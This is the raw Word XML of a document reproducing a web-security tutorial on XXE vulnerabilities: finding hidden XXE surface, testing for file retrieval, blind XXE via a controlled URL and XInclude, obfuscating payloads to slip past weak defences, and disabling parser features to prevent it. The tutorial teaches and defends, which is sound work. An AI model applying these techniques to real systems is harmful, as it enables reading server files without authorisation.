      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&lt;?xml version="1.0" encoding="UTF-8"?&gt;&lt;foo&gt;bar&lt;/foo&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1399557C"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If the application tolerates requests containing XML in the message body, and parses the body content as XML, then you can reach the hidden XXE attack surface simply by reformatting requests to use the XML format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7140AC"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How to find and test for XXE vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCB0364"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The vast majority of XXE vulnerabilities can be found quickly and reliably using Burp Suite's </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00B20233">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-IN"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>web vulnerability scanner</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4DE560"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Manually testing for XXE vulnerabilities generally involves:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296569BF" w14:textId="77777777"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w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:anchor="exploiting-xxe-to-retrieve-files" w:history="1">
        <w:r w:rsidRPr="00B20233">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-IN"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>file retrieval</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> by defining an external entity based on a well-known operating system file and using that entity in data that is returned in the application's response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32967E02" w14:textId="77777777"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w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00B20233">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-IN"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>blind XXE vulnerabilities</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> by defining an external entity based on a URL to a system that you control, and monitoring for interactions with that system. </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00B20233">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-IN"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>Burp Collaborator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> is perfect for this purpose.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526CE05A" w14:textId="77777777" w:rsidR="00B20233" w:rsidRPr="00B20233" w:rsidRDefault="00B20233" w:rsidP="00B20233">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Testing for vulnerable inclusion of user-supplied non-XML data within a server-side XML document by using an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:instrText>HYPERLINK "https://portswigger.net/web-security/xxe" \l "xinclude-attacks"</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>XInclude</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack</w:t>
      </w:r>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> to try to retrieve a well-known operating system file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E7BD6E" w14:textId="77777777" w:rsidR="00B20233" w:rsidRPr="00B20233" w:rsidRDefault="00B20233" w:rsidP="00B20233">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B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165AEB8C" w14:textId="77777777" w:rsidR="00B20233" w:rsidRDefault="00B20233"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B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Keep in mind that XML is just a data transfer format. Make sure you also test any XML-based functionality for other vulnerabilities like </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="00B20233">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-IN"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>XSS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00B20233">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-IN"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>SQL injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>. You may need to encode your payload using XML escape sequences to avoid breaking the syntax, but you may also be able to use this to </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:anchor="obfuscation-via-xml-encoding" w:history="1">
        <w:r w:rsidRPr="00B20233">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-IN"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>obfuscate your attack</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> in order to bypass weak defences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D60E4C" w14:textId="77777777" w:rsidR="00C02782" w:rsidRPr="00B20233" w:rsidRDefault="00C02782" w:rsidP="00B20233">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F9FD"/>
        <w:spacing w:after="120" w:line="450" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="390B1162" w14:textId="77777777" w:rsidR="00B20233" w:rsidRPr="00B20233" w:rsidRDefault="00B20233" w:rsidP="00B20233">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="150" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>How to prevent XXE vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A6A6ED"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Virtually all XXE vulnerabilities arise because the application's XML parsing library supports potentially dangerous XML features that the application does not need or intend to use. The easiest and most effective way to prevent XXE attacks is to disable those features.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5ED97F" w14:textId="77777777" w:rsidR="00B20233" w:rsidRPr="00B20233" w:rsidRDefault="00B20233" w:rsidP="00B20233">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="450" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Generally, it is sufficient to disable resolution of external entities and disable support for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>XInclude</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. This can usually be done via configuration options or by programmatically overriding default </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>. Consult the documentation for your XML parsing library or API for details about how to disable unnecessary capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD55385"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1C1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F65A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929F8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="909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E7090"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="02F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7071"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DC4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C3E3F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8C0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0230D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C20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653C6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="111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829D1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D6A2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96B18"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AE5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F06D7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="194A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41201">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2063672681">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="326055095">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1346785912">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1717192822">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="644045482">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2008095932">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1382558347">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1448967306">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1497379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3"/>
    <w:rsid w:val="00026B1D"/>
    <w:rsid w:val="00087CDF"/>
    <w:rsid w:val="001258EF"/>
    <w:rsid w:val="002E4BAD"/>
    <w:rsid w:val="00694A08"/>
    <w:rsid w:val="00B20233"/>
    <w:rsid w:val="00C02782"/>
    <w:rsid w:val="00CB5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2017"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F95D0260-E41F-44BA-8ECC-395D67E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02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202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023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23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2023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023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20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20233"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B20233"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="label-light-green-small">
    <w:name w:val="label-light-green-small"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B20233"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="label-light-blue-small">
    <w:name w:val="label-light-blue-small"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B2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1019">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1006592761">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="450"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1863123905">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="450"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="141242704">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="450"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2109500393">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="450"/>
          <w:marBottom w:val="480"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1597443323">
              <w:marLeft w:val="150"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="150"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1339430469">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="480"/>
          <w:marBottom w:val="480"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1796216949">
              <w:marLeft w:val="150"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="150"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="755245561">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="450"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1989553831">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="480"/>
          <w:marBottom w:val="480"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1903786426">
              <w:marLeft w:val="150"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="150"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="794835681">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="480"/>
          <w:marBottom w:val="480"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1474324438">
              <w:marLeft w:val="150"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="150"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1682312150">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="450"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
